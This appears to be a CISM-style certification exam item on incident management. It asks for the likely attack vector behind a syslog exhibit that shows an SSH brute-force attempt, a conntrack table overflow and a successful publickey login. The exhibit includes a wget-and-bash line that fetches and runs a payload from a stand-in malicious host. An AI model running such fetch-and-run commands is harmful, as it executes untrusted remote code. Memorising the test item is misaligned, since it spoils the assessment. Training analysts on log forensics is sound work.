CISM

1

Incident Management

hard

Based on the exhibit, what is the MOST likely attack vector that led to the compromise?

Exhibit

Refer to the exhibit.

Exhibit: Syslog output from a compromised server:

Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
... (repeated 100 times)
Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet.
Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2
Mar 15 10:25:10 server1 bash: sudo: whoami
Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh
Mar 15 10:25:30 server1 bash: bash payload.sh